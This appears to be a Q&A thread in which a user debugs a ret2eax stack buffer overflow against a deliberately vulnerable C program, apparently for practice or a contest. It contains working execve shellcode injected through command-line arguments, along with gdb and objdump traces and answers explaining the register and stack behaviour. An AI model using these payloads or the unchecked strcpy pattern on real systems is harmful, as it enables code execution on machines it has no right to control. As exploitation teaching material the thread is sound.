# problems with a ret2eax

Tags: c, assembly, buffer-overflow, shellcode

I had some problem in trying to overwrite the saved return address. Here is my code :

```
  1 #include <stdio.h>
  2 #include <string.h>
  3 
  4 void foo(char *source)
  5 {
  6     char buf[64];
  8     printf("buf address: %p\n", buf);
  9     strcpy(buf, source);
 11 }
 12 int main(int argc, char **argv)
 13 {
 14     if(argc > 1)
 15         foo(argv[1]);
 16     else
 17         exit(0);
 18 
 19   return 0;
 20 }
```

First with an easy and simple exploitation :

```
./vuln `python -c 'print "\x90"*24+"\x48\x31\xd2\x48\x89\xd6\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe7\x08\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb8\x3b\x11\x11\x11\x11\x11\x11\x11\x48\xc1\xe0\x38\x48\xc1\xe8\x38\x0f\x05"+"\x10\xe3\xff\xff\xff\x7f"'`
buf address: 0x7fffffffe310
```

-> spawns a shell

Now without having to ressort to printf to have the address of my shellcode. I wanted to try a ret2eax.

So I found its address using objdump :

```
00000000004004bc <call_gmon_start>:
  4004bc:   48 83 ec 08             sub    $0x8,%rsp
  4004c0:   48 8b 05 11 05 20 00    mov    0x200511(%rip),%rax        # 6009d8 <_DYNAMIC+0x1e0>
  4004c7:   48 85 c0                test   %rax,%rax
  4004ca:   74 02                   je     4004ce <call_gmon_start+0x12>
  4004cc:   ff d0                   callq  *%rax
  4004ce:   48 83 c4 08             add    $0x8,%rsp
```

Or here :

```
0000000000400570 <frame_dummy>:
  400570:   48 83 3d 78 02 20 00    cmpq   $0x0,0x200278(%rip)        # 6007f0 <__JCR_END__>
  400577:   00 
  400578:   74 1b                   je     400595 <frame_dummy+0x25>
  40057a:   b8 00 00 00 00          mov    $0x0,%eax
  40057f:   48 85 c0                test   %rax,%rax
  400582:   74 11                   je     400595 <frame_dummy+0x25>
  400584:   55                      push   %rbp
  400585:   bf f0 07 60 00          mov    $0x6007f0,%edi
  40058a:   48 89 e5                mov    %rsp,%rbp
  40058d:   ff d0                   callq  *%rax
```

But when I write :

```
./vuln `python -c 'print "\x90"*24+"\x48\x31\xd2\x48\x89\xd6\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe7\x08\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb8\x3b\x11\x11\x11\x11\x11\x11\x11\x48\xc1\xe0\x38\x48\xc1\xe8\x38\x0f\x05"+"\x8d\x05\x40"'`
```

-> I just get a segmentation error why is that ?

With gdb and a breakpoint at the retq in foo():

```
Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe332 in ?? ()
(gdb) x/i $rip
=> 0x7fffffffe332:  sbb    (%rax),%al
```

The disassembly of foo() if needed :

```
   0x000000000040059c <+0>: push   %rbp
   0x000000000040059d <+1>: mov    %rsp,%rbp
   0x00000000004005a0 <+4>: sub    $0x50,%rsp
   0x00000000004005a4 <+8>: mov    %rdi,-0x48(%rbp)
   0x00000000004005a8 <+12>:    lea    -0x40(%rbp),%rax
   0x00000000004005ac <+16>:    mov    %rax,%rsi
   0x00000000004005af <+19>:    mov    $0x4006bc,%edi
   0x00000000004005b4 <+24>:    mov    $0x0,%eax
   0x00000000004005b9 <+29>:    callq  0x400460 <printf@plt>
   0x00000000004005be <+34>:    mov    -0x48(%rbp),%rdx
   0x00000000004005c2 <+38>:    lea    -0x40(%rbp),%rax
   0x00000000004005c6 <+42>:    mov    %rdx,%rsi
   0x00000000004005c9 <+45>:    mov    %rax,%rdi
   0x00000000004005cc <+48>:    callq  0x400450 <strcpy@plt>
   0x00000000004005d1 <+53>:    leaveq 
=> 0x00000000004005d2 <+54>:    retq
```

Comment: Your string of `argv[1]` is more than 90 bytes. Do you think it is too much?

Comment: No, buf is at -0x50(%rbp) in the disassembly. So I need to write 88 chars to get to the position of the return address. Proof is: I can spawn a shellcode in my first example. And then you can see that I get a segfault at 0x40058d which should be the address of the statement callq *rax

Answer (score 0):

You haven't pasted the assembly code for your function `foo` but I assume the compiler used a local variable on the stack to store the value of `ptr`, and this variable happened to be located above your array in the memory region that you have overwritten. What it all boils down to is that `rax` won't contain a pointer to your code in the buffer.
For reference, my non-optimized build looks like this:

```
   0x00000000004005c6 <+42>:    mov    -0x58(%rbp),%rdx
   0x00000000004005ca <+46>:    lea    -0x50(%rbp),%rax
   0x00000000004005ce <+50>:    mov    %rdx,%rsi
   0x00000000004005d1 <+53>:    mov    %rax,%rdi
   0x00000000004005d4 <+56>:    callq  0x400450 <strcpy@plt>
   0x00000000004005d9 <+61>:    mov    -0x8(%rbp),%rax
   0x00000000004005dd <+65>:    leaveq
   0x00000000004005de <+66>:    retq
```

As you can see `buf` is at `rbp-0x50` and `ptr` is at `rbp-8`, between the array and the return address. Since `strcpy` returns the destination argument, you can change the C code to do `return strcpy(buf, source)` instead. Also, enabling optimization happens to eliminate the local variable hence fixing the problem, but that is not very reliable.

Given that you were already in `gdb`, you should have checked the value in `rax` at the time of the fault, since it is pretty much the only reason that could account for a crash.

Comment: Hi, yes you're right. I have updated my post. If you look at my code above, this time I can get to the frame_dummy statement : call *$rax but then I get this 0x00007fffffffe2f0 in ?? (). Which is the address of my buffer. I checked it by breaking before strcpy and looking into $rax and $rdi. Now I don't understant why it won't execute the shellcode ?

Comment: At that point, make sure your code is really there by doing `x/i $rip` and that it is not itself faulting. Also don't forget to mark stack executable (but that was needed for the first method too, so I assume you got that).

Comment: It's completely absurd, I effectively fall in the NOP SLED : (gdb) x/i $rip
=> 0x7fffffffe2f0: nop
but it doesn't execute shellcode. (My stack is executable : -z execstack)

Comment: Do you get a fault at all? Or what's the problem? The `stepi` you posted will of course just execute 1 instruction, and the `??` just means gdb doesn't know which function you are in.

Comment: Oh sorry completely forgot ! Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe332 in ?? ()
(gdb) x/i $rip
=> 0x7fffffffe332: sbb    (%rax),%al

Comment: The statement is different compared to when I entered the first NOP :
x/i 0x7fffffffe332
   0x7fffffffe332: shr    $0x38,%rax

Comment: Your code is then presumably overwriting itself at some point between the start and the fault. You didn't post the assembly for your payload, either.

Comment: here is where I took the shellcode : http://turkeyland.net/projects/overflow/shell.php (it's at the bottom of the page)

Comment: let us [continue this discussion in chat](http://chat.stackoverflow.com/rooms/48202/discussion-between-jester-and-user3102158)

Comment: Thank you ! you are totally right, but how come the push have actually overflowed the end of my buffer and not the beginning ? It should be like this I suppose : [rsp]-> [nop+shellcode+callq *rax] [rbp] [rip] ... -> lower address of the stack

Comment: When the `RET` is executed `rsp` already points at the return address that you denoted with `[rip]`. Also, your code has of course already overwritten `[rbp]` to get to `[rip]`. Finally, stack grows down, so at the end you should have "higher address".

Comment: Ok, on a remote pc for a contest I tried the exploit (x64 bits) and I can't find a way to completely overwrite the return address like in this example. The address I want to jump to is 0x4004ed and then when I hit the return statement. $rip equals : 0x7fff004004ed. First how is that that on my pc I did not have this problem, and how can I inject NULL bytes ?

Comment: The code is : main (int argc, char *argv[])
{
  char buffer[64];

  if (argc > 1)
    strcpy (buffer, argv[1]);

  return 0;
}